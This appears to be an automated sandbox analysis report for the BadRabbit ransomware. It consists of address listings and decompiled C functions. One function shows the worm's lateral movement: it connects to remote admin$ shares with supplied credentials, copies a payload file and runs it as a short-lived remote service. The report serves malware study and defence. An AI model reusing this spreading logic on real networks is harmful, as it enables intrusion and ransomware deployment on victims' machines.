0x01321d58
0x01321d5a
0x01321d5a
0x01321d5d
0x01321d5e
0x01321d61
0x01321d64
0x01321d67
0x01321d6a
0x00000000
0x00000000
0x00000000
0x01321d6a
0x00000000
0x00000000
0x01321ddc
0x01321ddc
0x01321ddf
0x01321e0e
0x01321e0e
0x01321e10
0x01321e15
0x01321e19
0x01321e1c
0x01321e20
0x01321e23
0x01321e25
0x01321e28
0x01321e2a
0x01321e2d
0x01321e30
0x01321e32
0x01321e35
0x01321e38
0x01321e3a
0x01321e3c
0x01321e42
0x01321e45
0x00000000
0x01321e45
0x01321de1
0x01321de1
0x01321de4
0x01321de4
0x01321de4
0x01321de6
0x00000000
0x00000000
0x01321dec
0x01321dec
0x01321df0
0x01321df3
0x01321df5
0x01321df7
0x01321dfa
0x01321dfd
0x01321dff
0x01321e02
0x01321e03
0x01321e06
0x01321e09
0x01321e0c
0x00000000
0x00000000
0x00000000
0x01321e0c
0x00000000
0x00000000
0x01321e49
0x01321e49
0x01321e49
0x01321e4b
0x01321e4b
0x01321e4e
0x01322a18
0x01322a18
0x01322a1b
0x01322a1e
0x01322a21
0x01322a24
0x01322a27
0x01322a29
0x01322a2c
0x01322a2f
0x01322a32
0x00000000
0x01322a32
0x01321e54
0x01321e57
0x01321e5c
0x01321e5f
0x01321e62
0x01321e65
0x01321e68
0x00000000
0x00000000
0x01321e6e
0x01321e6e
0x01321e72
0x00000000
0x00000000
0x01321e78
0x01321e78
0x01321e7c
0x00000000
0x00000000
0x00000000
0x00000000
0x01321e82
0x01321e82
0x01321e86
0x01321ea2
0x01321ea2
0x01321ea5
0x01321ed4
0x01321ed4
0x01321ed6
0x01321edb
0x01321ee0
0x01321ee3
0x01321ee3
0x01321ee6
0x01321f2a
0x01321f2a
0x01321f30
0x01321f30
0x01321f33
0x013218eb
0x013218eb
0x013218ee
0x00000000
0x013218ee
0x01321ee8
0x01321ee8
0x01321ee8
0x01321ee9
0x01321f07
0x01321f08
0x01321f10
0x01321f16
0x01321f1a
0x00000000
0x00000000
0x01321f1c
0x01321f1c
0x01321f1f
0x01321f22
0x00000000
0x01321f22
0x01321eeb
0x01321eeb
0x01321eeb
0x01321eec
0x01321f00
0x01321f02
0x01321f03
0x01321eee
0x01321eee
0x01321eee
0x01321eef
0x01321ef1
0x01321ef8
0x01321ef8
0x01321eef
0x00000000
0x01321eec
0x01321ea7
0x01321ea7
0x01321eaa
0x01321eaa
0x01321eaa
0x01321eac
0x00000000
0x00000000
0x01321eb2
0x01321eb2
0x01321eb6
0x01321eb9
0x01321ebb
0x01321ebd
0x01321ec0
0x01321ec3
0x01321ec5
0x01321ec8
0x01321ec9
0x01321ecc
0x01321ecf
0x01321ed2
0x00000000
0x00000000
0x00000000
0x01321ed2
0x00000000
0x01321eaa
0x01321e88
0x01321e88
0x01321e8a
0x01321e90
0x01321e93
0x01321e95
0x01321e97
0x01321e9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0132201d
0x0132201d
0x01322020
0x0132204f
0x0132204f
0x01322051
0x01322054
0x01322057
0x0132205a
0x0132205f
0x01322062
0x01322065
0x01322067
0x0132206a
0x0132206e
0x01322071
0x01322073
0x01322076
0x01322079
0x0132207c
0x0132207f
0x01322086
0x01322089
0x0132209c
0x0132209c
0x00000000
0x0132209c
0x0132208b
0x0132208b
0x0132208f
0x00000000
0x00000000
0x01322091
0x01322091
0x01322095
0x01322097
0x01322098
0x00000000
0x01322098
0x01322022
0x01322022
0x01322025
0x01322025
0x01322025
0x01322027
0x00000000
0x00000000
0x0132202d
0x0132202d
0x01322031
0x01322034
0x01322036
0x01322038
0x0132203b
0x0132203e
0x01322040
0x01322043
0x01322044
0x01322047
0x0132204a
0x0132204d
0x00000000
0x00000000
0x00000000
0x0132204d
0x00000000
0x00000000
0x01322101
0x01322101
0x01322101
0x01322104
0x01322107
0x00000000
0x00000000
0x013220a8
0x013220a8
0x013220ab
0x013220da
0x013220da
0x013220df
0x013220e2
0x013220e5
0x013220e8
0x013220f0
0x013220f5
0x013220f8
0x013220f8
0x013220fb
0x013220fe
0x00000000
0x013220fe
0x013220ad
0x013220ad
0x013220b0
0x013220b0
0x013220b0
0x013220b2
0x00000000
0x00000000
0x013220b8
0x013220b8
0x013220bc
0x013220bf
0x013220c1
0x013220c3
0x013220c6
0x013220c9
0x013220cb
0x013220ce
0x013220cf
0x013220d2
0x013220d5
0x013220d8
0x00000000
0x00000000
0x00000000
0x013220d8
0x00000000
0x013220b0
0x01322109
0x01322120
0x01322120
0x01322120
0x01322124
0x00000000
0x00000000
0x0132210b
0x0132210b
0x0132210e
0x01322110
0x01322118
0x0132211d
0x0132211d
0x0132211d
0x0132211d
0x01322126
0x01322126
0x0132212c
0x0132212f
0x01322132
0x01322134
0x01322137
0x0132213d
0x01322148
0x0132214e
0x01322156
0x01322159
0x0132215b
0x0132216f
0x0132216f
0x01322173
0x00000000
0x01322173
0x0132215d
0x0132215d
0x00000000
0x00000000
0x0132232f
0x0132232f
0x01322332
0x01322335
0x01322338
0x0132233b
0x0132233d
0x00000000
0x00000000
0x00000000
0x00000000
0x013221a1
0x013221a1
0x013221a1
0x013221a4
0x013221a6
0x013221aa
0x013221ac
0x013221ad
0x013221b0
0x013221b5
0x013221b8
0x013221bb
0x013221be
0x013221c0
0x00000000
0x00000000
0x0132217e
0x0132217e
0x01322181
0x01322183
0x00000000
0x00000000
0x01322189
0x01322189
0x0132218d
0x01322190
0x01322195
0x01322197
0x0132219b
0x0132219e
0x0132219e
0x0132219e
0x013221c2
0x013221c2
0x013221c4
0x013221c6
0x013221c9
0x013221ca
0x013221cd
0x013221ed
0x013221ed
0x0132225e
0x0132225e
0x01322261
0x01322263
0x01322264
0x01322268
0x0132226b
0x013222b5
0x013222b5
0x013222b8
0x013222b8
0x013222b8
0x013222b8
0x013222bb
0x013222bd
0x00000000
0x00000000
0x013222bf
0x013222bf
0x013222c2
0x013222c4
0x00000000
0x00000000
0x013222ca
0x013222ca
0x013222ce
0x013222d1
0x013222d6
0x013222d8
0x013222db
0x013222dd
0x013222e0
0x013222e3
0x013222e3
0x013222e8
0x013222e8
0x013222ea
0x013222ec
0x013222ef
0x013222f2
0x013222f4
0x013222f5
0x013222f8
0x013222f8
0x013222fb
0x013222fb
0x013222ff
0x013222ff
0x01322301
0x01322304
0x01322307
0x0132230a
0x0132230d
0x01322310
0x01322313
0x01322315
0x01322351
0x01322351
0x01322358
0x0132235e
0x0132235e
0x01322361
0x01321dbf
0x01321dbf
0x00000000
0x01321dbf
0x01322367
0x01322367
0x01322369
0x01322370
0x0132237e
0x0132237e
0x01322384
0x01322387
0x0132238a
0x0132238c
0x0132238f
0x01322395
0x013223a1
0x013223a7
0x013223af
0x013223b2
0x013223b4
0x013223c2
0x013223c2
0x013223c5
0x013223c7
0x013223ca
0x013223d4
0x013223dc
0x013223df
0x013223e5
0x013223eb
0x013223f3
0x013223f6
0x013223f8
0x01322406
0x01322406
0x0132240a
0x0132240d
0x01322413
0x00000000
0x00000000
0x01322419
0x01322419
0x00000000
0x01322419
0x013223fa
0x013223fa
0x01322164
0x01322164
0x00000000
0x01322164
0x013223b6
0x013223b6
0x00000000
0x013223b6
0x01322372
0x01322372
0x00000000
0x01322372
0x01322317
0x01322317
0x0132231a
0x0132231c
0x00000000
0x00000000
0x0132231e
0x0132231e
0x01322321
0x01322321
0x01322321
0x01322324
0x01322329
0x0132232c
0x0132232c
0x0132232c
0x00000000
0x01322321
0x0132226d
0x0132226d
0x01322270
0x01322270
0x01322270
0x01322270
0x01322273
0x01322275
0x00000000
0x00000000
0x01322277
0x01322277
0x0132227a
0x0132227c
0x00000000
0x00000000
0x01322282
0x01322282
0x01322286
0x01322289
0x0132228e
0x01322290
0x01322293
0x01322295
0x01322298
0x0132229b
0x0132229b
0x013222a0
0x013222a0
0x013222a2
0x013222a4
0x013222a7
0x013222aa
0x013222ac
0x013222ad
0x013222b0
0x00000000
0x013222b0
0x013221ef
0x013221f1
0x013221f4
0x013221f7
0x013221fa
0x013221fd
0x013221ff
0x01322228
0x01322228
0x0132222b
0x0132222e
0x01322231
0x01322233
0x01322235
0x01322238
0x0132223b
0x0132223d
0x01322345
0x01322345
0x00000000
0x01322345
0x01322243
0x01322243
0x01322248
0x0132224a
0x0132224d
0x01322250
0x01322253
0x01322256
0x00000000
0x00000000
0x00000000
0x00000000
0x01322201
0x01322201
0x01322201
0x01322204
0x01322206
0x00000000
0x00000000
0x0132220c
0x0132220d
0x01322210
0x01322213
0x01322216
0x01322218
0x0132221a
0x0132221d
0x01322220
0x01322223
0x01322226
0x00000000
0x00000000
0x00000000
0x01322226
0x00000000
0x01322201
0x013221cf
0x013221cf
0x013221d2
0x013221d5
0x013221d8
0x013221da
0x013221dd
0x013221e0
0x013221e5
0x013221e5
0x01322343
0x00000000
0x00000000
0x0132241c
0x0132241c
0x00000000
0x00000000
0x01322422
0x01322422
0x01322425
0x0132248e
0x0132248e
0x01322491
0x01322494
0x0132249b
0x013224a0
0x013224a1
0x013224a3
0x013224a6
0x013224a7
0x013224a9
0x013224ea
0x013224ea
0x013224ec
0x013224ef
0x013224f2
0x013224f4
0x00000000
0x00000000
0x013224ae
0x013224ae
0x013224b1
0x013224b3
0x00000000
0x00000000
0x013224b9
0x013224b9
0x013224bd
0x013224c0
0x013224c2
0x013224c5
0x013224cb
0x013224cd
0x013224d0
0x013224d2
0x013224d5
0x013224d8
0x013224dd
0x013224e0
0x013224e1
0x013224e1
0x013224e4
0x013224e7
0x013224e7
0x013224f6
0x013224f6
0x013224f8
0x013225b2
0x013225b4
0x013225b7
0x013225ba
0x013225c0
0x013225c2
0x013225c4
0x013225c6
0x013225c9
0x013225cc
0x013225cf
0x013225d2
0x013225d4
0x013225e1
0x013225e1
0x013225e3
0x013225f7
0x013225f7
0x013225fa
0x013225fc
0x0132260a
0x0132260a
0x0132260d
0x0132260d
0x01322610
0x01322616
0x00000000
0x01322616
0x013225fe
0x013225fe
0x01321953
0x01321953
0x00000000
0x01321953
0x013225e5
0x013225e5
0x013225ec
0x00000000
0x013225ec
0x013225d6
0x013225d6
0x00000000
0x013225d6
0x013224fe
0x013224fe
0x01322500
0x00000000
0x00000000
0x01322506
0x01322506
0x01322508
0x0132250b
0x0132250d
0x0132250e
0x01322511
0x01322513
0x01322516
0x01322518
0x0132251b
0x0132251d
0x0132251f
0x01322520
0x01322526
0x01322528
0x0132252b
0x0132252d
0x01322530
0x01322532
0x01322535
0x01322538
0x0132253b
0x0132253e
0x01322541
0x01322543
0x01322545
0x0132259f
0x0132259f
0x013225a2
0x013225a5
0x013225a8
0x013225aa
0x013225aa
0x013225ac
0x00000000
0x00000000
0x00000000
0x00000000
0x01322547
0x01322547
0x01322547
0x0132254a
0x0132254c
0x00000000
0x00000000
0x01322552
0x01322552
0x01322553
0x01322555
0x01322558
0x0132255b
0x0132255e
0x01322561
0x01322567
0x01322569
0x0132256c
0x0132256d
0x01322571
0x01322576
0x0132257a
0x0132257c
0x0132257e
0x01322581
0x01322584
0x01322586
0x01322588
0x0132258b
0x01322590
0x01322593
0x01322596
0x01322598
0x0132259b
0x0132259d
0x00000000
0x00000000
0x00000000
0x0132259d
0x00000000
0x01322547
0x01322427
0x01322427
0x0132242a
0x0132242f
0x00000000
0x00000000
0x01322431
0x01322431
0x01322434
0x01322437
0x0132243a
0x0132243d
0x01322440
0x01322443
0x01322445
0x01322448
0x01322449
0x0132244c
0x0132244f
0x01322454
0x01322457
0x0132245a
0x0132245d
0x01322460
0x01322461
0x01322464
0x01322467
0x01322468
0x0132246b
0x0132246e
0x01322470
0x01322473
0x01322476
0x01322479
0x0132247c
0x01322482
0x01322482
0x00000000
0x00000000
0x01322619
0x01322619
0x0132261c
0x0132261e
0x0132266d
0x0132266d
0x01322670
0x01322676
0x00000000
0x01322676
0x01322620
0x01322620
0x01322622
0x01322650
0x01322650
0x01322652
0x01322654
0x01322655
0x01322659
0x0132265a
0x0132265d
0x0132265f
0x01322661
0x01322664
0x01322664
0x01322664
0x0132266a
0x00000000
0x0132266a
0x01322624
0x01322624
0x01322627
0x01322627
0x01322627
0x01322629
0x00000000
0x00000000
0x0132262f
0x0132262f
0x01322633
0x01322636
0x01322638
0x0132263a
0x0132263d
0x01322640
0x01322642
0x01322645
0x01322646
0x01322649
0x0132264c
0x0132264e
0x00000000
0x00000000
0x00000000
0x0132264e
0x00000000
0x00000000
0x0132267c
0x0132267c
0x0132267f
0x01322681
0x01322685
0x01322687
0x01322688
0x0132268b
0x0132268d
0x01322692
0x01322695
0x01322698
0x0132269a
0x013226e4
0x013226e4
0x013226e6
0x01322795
0x01322795
0x0132279a
0x0132279d
0x013227a0
0x013227a6
0x013227a8
0x013227aa
0x013227ad
0x013227b0
0x013227b2
0x013227c0
0x013227c0
0x013227c2
0x013227c8
0x013227cb
0x013227ce
0x013227ce
0x013227d1
0x013227d4
0x00000000
0x013227d4
0x013227b4
0x013227b4
0x00000000
0x013227b4
0x013226ec
0x013226ec
0x013226ee
0x013226f1
0x013226f3
0x013226f4
0x013226f7
0x013226f9
0x013226fc
0x013226fe
0x01322701
0x01322703
0x01322705
0x01322706
0x0132270c
0x0132270e
0x01322711
0x01322713
0x01322716
0x01322718
0x0132271b
0x0132271e
0x01322721
0x01322724
0x01322727
0x01322729
0x0132272b
0x01322785
0x01322785
0x01322788
0x0132278b
0x0132278d
0x0132278f
0x0132278f
0x0132278f
0x00000000
0x00000000
0x00000000
0x00000000
0x0132272d
0x0132272d
0x0132272d
0x01322730
0x01322732
0x00000000
0x00000000
0x01322738
0x01322738
0x01322739
0x0132273b
0x0132273e
0x01322741
0x01322744
0x01322747
0x0132274d
0x0132274f
0x01322752
0x01322753
0x01322757
0x0132275c
0x01322760
0x01322762
0x01322764
0x01322767
0x0132276a
0x0132276c
0x0132276e
0x01322771
0x01322776
0x01322779
0x0132277c
0x0132277e
0x01322781
0x01322783
0x00000000
0x00000000
0x00000000
0x01322783
0x00000000
0x0132272d
0x0132269c
0x0132269c
0x0132269f
0x0132269f
0x0132269f
0x013226a1
0x00000000
0x00000000
0x013226a7
0x013226a7
0x013226aa
0x013226ac
0x013226ad
0x013226b0
0x013226b3
0x013226b9
0x013226bb
0x013226be
0x013226c0
0x013226c3
0x013226c6
0x013226cb
0x013226ce
0x013226cf
0x013226d2
0x013226d5
0x013226d7
0x013226dd
0x013226e0
0x013226e2
0x00000000
0x00000000
0x00000000
0x013226e2
0x00000000
0x00000000
0x013227d7
0x013227d7
0x013227da
0x013227dc
0x0132282c
0x0132282c
0x00000000
0x0132282c
0x013227de
0x013227de
0x013227e0
0x01322811
0x01322811
0x01322813
0x01322815
0x01322816
0x0132281b
0x0132281c
0x0132281e
0x01322820
0x01322823
0x01322823
0x01322823
0x01322829
0x00000000
0x01322829
0x013227e2
0x013227e2
0x013227e5
0x013227e5
0x013227e5
0x013227e8
0x013227ea
0x00000000
0x00000000
0x013227f0
0x013227f0
0x013227f4
0x013227f7
0x013227f9
0x013227fb
0x013227fe
0x01322801
0x01322803
0x01322806
0x01322807
0x0132280a
0x0132280d
0x0132280f
0x00000000
0x00000000
0x00000000
0x0132280f
0x00000000
0x00000000
0x01322832
0x01322832
0x01322835
0x01322837
0x00000000
0x00000000
0x0132283d
0x0132283d
0x01322840
0x01322842
0x01322845
0x01322847
0x01322888
0x01322888
0x0132288b
0x0132288b
0x0132288d
0x01322890
0x01322893
0x01322893
0x01322895
0x01322895
0x01322898
0x0132289a
0x0132289d
0x0132289f
0x013228a1
0x013228a4
0x013228a7
0x013228aa
0x013228ad
0x013228ad
0x013228af
0x013228af
0x013228af
0x013228b2
0x013228b4
0x013228b5
0x013228b5
0x013228b5
0x013228b8
0x013228bb
0x013228be
0x013228c1
0x013228c4
0x013228ca
0x013228ca
0x00000000
0x013228c4
0x01322849
0x01322849
0x0132284b
0x0132284e
0x01322865
0x01322865
0x01322868
0x0132286b
0x01322877
0x01322879
0x01322879
0x0132286d
0x0132286d
0x01322870
0x01322873
0x01322873
0x0132287c
0x0132287f
0x01322882
0x01322884
0x00000000
0x01322886
0x01322886
0x00000000
0x01322886
0x01322884
0x01322850
0x01322850
0x01322857
0x00000000
0x00000000
0x01322859
0x01322859
0x00000000
0x00000000
0x013228d5
0x013228d5
0x013228d9
0x00000000
0x00000000
0x013228df
0x013228df
0x013228e2
0x013228e5
0x013228e8
0x013228eb
0x013228ed
0x013228f0
0x00000000
0x00000000
0x013228fb
0x013228fb
0x013228ff
0x01322900
0x00000000
0x013229c8
0x013229c8
0x013229ca
0x013229cd
0x01322a3e
0x01322a3e
0x00000000
0x01322a3e
0x013229cf
0x013229cf
0x013229d2
0x00000000
0x00000000
0x013229d4
0x013229d4
0x013229d7
0x01322a07
0x01322a07
0x01322a0a
0x01322a39
0x01322a39
0x01322a3c
0x00000000
0x01322a3c
0x01322a0c
0x01322a0c
0x01321899
0x01321899
0x01321dc2
0x01321dc2
0x00000000
0x01321dc2
0x013229d9
0x013229d9
0x013229dc
0x013229dc
0x013229dc
0x013229de
0x00000000
0x00000000
0x013229e0
0x013229e0
0x013229e4
0x013229e7
0x013229e9
0x013229eb
0x013229ee
0x013229f1
0x013229f3
0x013229f6
0x013229f7
0x013229fa
0x013229fd
0x01322a00
0x01322a03
0x00000000
0x00000000
0x01322a05
0x01322a05
0x01322a05
0x00000000
0x01322a05
0x00000000
0x00000000
0x01322a44
0x01322a44
0x01322a46
0x00000000
0x00000000
0x01322a49
0x01322a49
0x01322a4b
0x01322a4c
0x01322a4c
0x01322a4f
0x01322a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x013217be
0x01321dd0
0x01321dd0
0x00000000
0x01321dd0
0x01321fcd
0x01321fcf
0x01321fd5
0x01321fd9
0x01321fde
0x00000000
0x00000000
0x01321fe4
0x01321feb
0x01321ff0
0x01321ff3
0x01321ff9
0x01321ffc
0x01321ffe
0x01322001
0x01322004
0x01322007
0x0132200a
0x00000000
0x0132200a
0x01321f92
0x01321f92
0x00000000
0x01321f92

APIs

memcpy.MSVCRT ref: 01321FEB

Strings

8 Oet, xrefs: 01322A52, 01322A9A
8 Oet, xrefs: 01322A5E
Oet, xrefs: 01322A4F
invalid stored block lengths, xrefs: 01321F92

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: memcpy
String ID: Oet$8 Oet$8 Oet$invalid stored block lengths
API String ID: 3510742995-3427597846
Opcode ID: e944a7336d4932b8a833548fc6629c73494809404ad5ac904f20951767874b45
Instruction ID: 29234c2a407977cebf29b905a3b40dde0d017404ca4f341d28a4feb5fccfd2b5
Opcode Fuzzy Hash: e944a7336d4932b8a833548fc6629c73494809404ad5ac904f20951767874b45
Instruction Fuzzy Hash: FA415A71E00229DFDF28DF69C9805AEBBF1FF98314B14856AD855D7644EB309A80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01322DCB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01322DCB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t34;
				int _t39;
				int _t41;
				void* _t49;
				intOrPtr _t52;
				int _t53;
				int _t54;
				intOrPtr _t57;
				int _t60;
				int _t62;
				intOrPtr _t64;
				void* _t65;

				_t57 = _a4;
				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
				if( *(_t64 + 0x34) != 0) {
					L3:
					if( *(_t64 + 0x28) == 0) {
						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
						 *(_t64 + 0x30) = 0;
						 *(_t64 + 0x2c) = 0;
					}
					_t60 =  *(_t64 + 0x28);
					_t52 = _a12;
					_t34 = _a8;
					if(_t52 < _t60) {
						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
						_t53 = _t52 - _t62;
						if(_t53 == 0) {
							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
							_t54 =  *(_t64 + 0x28);
							if( *(_t64 + 0x30) == _t54) {
								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
							}
							_t39 =  *(_t64 + 0x2c);
							if(_t39 >= _t54) {
								goto L15;
							} else {
								_t41 = _t39 + _t62;
								goto L14;
							}
						}
						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
						 *(_t64 + 0x30) = _t53;
						goto L7;
					} else {
						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
						L7:
						_t41 =  *(_t64 + 0x28);
						L14:
						 *(_t64 + 0x2c) = _t41;
						L15:
						return 0;
					}
				}
				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
				_t65 = _t65 + 0xc;
				 *(_t64 + 0x34) = 1;
				if(_t49 != 0) {
					goto L3;
				}
				return 1;
			}

0x01322dce
0x01322dd4
0x01322ddf
0x01322e01
0x01322e04
0x01322e0b
0x01322e0e
0x01322e11
0x01322e11
0x01322e14
0x01322e17
0x01322e1a
0x01322e1f
0x01322e3e
0x01322e4c
0x01322e54
0x01322e56
0x01322e6f
0x01322e72
0x01322e78
0x01322e7a
0x01322e7a
0x01322e7e
0x01322e83
0x00000000
0x01322e85
0x01322e85
0x00000000
0x01322e85
0x01322e83
0x01322e62
0x01322e6a
0x00000000
0x01322e21
0x01322e28
0x01322e30
0x01322e34
0x01322e34
0x01322e87
0x01322e87
0x01322e8a
0x00000000
0x01322e8a
0x01322e1f
0x01322ded
0x01322df0
0x01322df3
0x01322df8
0x00000000
0x00000000
0x00000000

APIs

memcpy.MSVCRT ref: 01322E28
memcpy.MSVCRT ref: 01322E4C
memcpy.MSVCRT ref: 01322E62

Strings

8 Oet, xrefs: 01322DD2

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: memcpy
String ID: 8 Oet
API String ID: 3510742995-3278195550
Opcode ID: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
Instruction ID: b678973a2bcac7f3cc519d683780e40b7694a2002983470851d366e0cc47d9d7
Opcode Fuzzy Hash: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
Instruction Fuzzy Hash: 3B216DB2610B159FC760AF29DE80963F7EAFF986187441A2DE88A87E10D331F844CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5364, Parent PID: 5660COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.7%
Total number of Nodes:	1348
Total number of Limit Nodes:	35

Executed Functions

Function 007B9534 Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 244
servicesharesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007B9534(int _a4, short* _a8, int _a12, short** _a16, long _a32, int _a36, void _a40, int _a44, void* _a48, struct _FILETIME _a52, void* _a56, struct _NETRESOURCE _a60, struct _SERVICE_STATUS _a100, intOrPtr _a104, short _a120, void _a122, short _a128, short _a152, char _a160, short _a184, char _a676, char _a680, char _a684, short _a1204, short _a1216, short _a1224, short _a3244, short _a3272, short _a5300, short _a5308, char _a7368, short _a7376) {
				int _v0;
				void* __ebx;
				short** _t78;
				WCHAR* _t96;
				int _t100;
				void* _t111;
				void* _t123;
				long _t124;
				int _t126;
				long _t131;
				long _t133;
				int _t137;
				signed int _t143;
				WCHAR* _t151;
				void* _t153;

				E007BA760(0x11cac);
				_t137 = _a4;
				_a4 = 0;
				_v0 = 0;
				_a12 = 0;
				if(_t137 == 0) {
					_v0 = 0x57;
					goto L36;
				} else {
					_a152 = 0;
					wsprintfW( &_a152, L"\\\\%s\\admin$", _t137);
					_a36 = 0;
					_t143 = 7;
					memset( &_a40, 0, _t143 << 2);
					_a56 =  &_a160;
					_a40 = 1;
					E007B88D3( &_a680);
					_t151 = L"\\\\%ws\\admin$\\%ws";
					wsprintfW( &_a3244, _t151, _t137,  &_a676);
					_a5300 = 0;
					_a1204 = 0;
					wsprintfW( &_a5300, _t151, _t137,  &_a684);
					_t96 = PathFindExtensionW( &_a5308);
					if(_t96 != 0) {
						 *_t96 = 0;
					}
					wsprintfW( &_a1216, _t151, _t137, L"cscc.dat");
					_a40 = _a40 & 0x00000000;
					while(1) {
						_t100 = WNetAddConnection2W( &_a60, _a12, _a8, 0); // executed
						_a44 = _t100;
						if(PathFileExistsW( &_a1224) != 0) {
							break;
						}
						GetLastError();
						if(E007B87E7( *0x7c7b94,  &_a3272,  *0x7c3984) != 0) {
							if(_a8 != 0 && _a12 != 0) {
								E007B68B5(_a8, _a12);
								 *0x7c3010 = 1;
							}
							_a7368 = 0;
							E007B944F( &_a7368);
							_t111 = OpenSCManagerW(_a4, 0, 0xf003f);
							_a44 = _t111;
							if(_t111 == 0) {
								_a32 = GetLastError();
								goto L31;
							} else {
								_a120 = 0;
								memset( &_a122, 0, 0x3e);
								GetSystemTimeAsFileTime( &_a52);
								wsprintfW( &_a120, L"%08X%08X", _a56, _a52.dwLowDateTime);
								_t123 = CreateServiceW(_a56,  &_a128, 0, 0xf01ff, 0x10, 3, 0,  &_a7376, 0, 0, 0, 0, 0);
								_a48 = _t123;
								if(_t123 == 0) {
									_t124 = GetLastError();
									_a40 = _t124;
									if(_t124 == 0x431) {
										_a44 = 1;
									}
									L29:
									CloseServiceHandle(_a56);
									L31:
									if(_a36 == 0) {
										DeleteFileW( &_a3272);
									}
									L33:
									if(_a44 == 0) {
										WNetCancelConnection2W( &_a184, 0, 1);
									}
									L36:
									_t78 = _a16;
									if(_t78 != 0) {
										 *_t78 = _a12;
									}
									SetLastError(_v0);
									return _a4;
								}
								_a40 = 0;
								_t126 = StartServiceW(_t123, 0, 0);
								_a44 = _t126;
								if(_t126 != 0) {
									L22:
									_t153 = 0xea60;
									while(QueryServiceStatus(_a48,  &_a100) != 0 && _a104 != 1) {
										Sleep(0x1388);
										_t153 = _t153 - 0x1388;
										if(_t153 > 0) {
											continue;
										}
										break;
									}
									L26:
									DeleteService(_a48);
									CloseServiceHandle(_a48);
									goto L29;
								}
								_t131 = GetLastError();
								_a40 = _t131;
								if(_t131 == 0x41d || _t131 == 0x420) {
									_a44 = 1;
									goto L22;
								} else {
									goto L26;
								}
							}
						}
						_t133 = GetLastError();
						_a32 = _t133;
						if(_t133 == 0x50 || _t133 == 0x35 || _t133 == 0x43 || _a44 != 0x4c3) {
							goto L33;
						} else {
							if(_a40 != 0) {
								goto L36;
							}
							WNetCancelConnection2W( &_a184, 0, 1);
							_a40 = 1;
							continue;
						}
					}
					_a36 = 1;
					goto L33;
				}
			}

0x007b953f
0x007b9545
0x007b954c
0x007b9550
0x007b9554
0x007b955a
0x007b985f
0x00000000
0x007b9560
0x007b9569
0x007b957e
0x007b9585
0x007b958b
0x007b9590
0x007b9599
0x007b95a5
0x007b95ad
0x007b95bb
0x007b95c9
0x007b95cd
0x007b95d5
0x007b95ef
0x007b95fc
0x007b9604
0x007b9608
0x007b9608
0x007b961a
0x007b9625
0x007b962a
0x007b9637
0x007b963d
0x007b9651
0x00000000
0x00000000
0x007b9653
0x007b9672
0x007b96d8
0x007b96e5
0x007b96ea
0x007b96ea
0x007b96f6
0x007b9706
0x007b9714
0x007b971a
0x007b9720
0x007b982c
0x00000000
0x007b9726
0x007b972a
0x007b9735
0x007b9742
0x007b975a
0x007b9783
0x007b9789
0x007b978f
0x007b9809
0x007b980b
0x007b9814
0x007b9816
0x007b9816
0x007b981e
0x007b9822
0x007b9830
0x007b9834
0x007b983e
0x007b983e
0x007b9844
0x007b9849
0x007b9857
0x007b9857
0x007b9867
0x007b9867
0x007b986c
0x007b9872
0x007b9872
0x007b9878
0x007b9888
0x007b9888
0x007b9794
0x007b9798
0x007b979e
0x007b97a4
0x007b97c2
0x007b97c2
0x007b97cc
0x007b97e7
0x007b97ed
0x007b97f1
0x00000000
0x00000000
0x00000000
0x007b97f1
0x007b97f3
0x007b97f7
0x007b9801
0x00000000
0x007b9801
0x007b97a6
0x007b97a8
0x007b97b1
0x007b97ba
0x00000000
0x00000000
0x00000000
0x00000000
0x007b97b1
0x007b9720
0x007b9674
0x007b9676
0x007b967d
0x00000000
0x007b96a3
0x007b96a7
0x00000000
0x00000000
0x007b96b9
0x007b96bf
0x00000000
0x007b96bf
0x007b967d
0x007b96c8
0x00000000
0x007b96c8

APIs

wsprintfW.USER32 ref: 007B957E

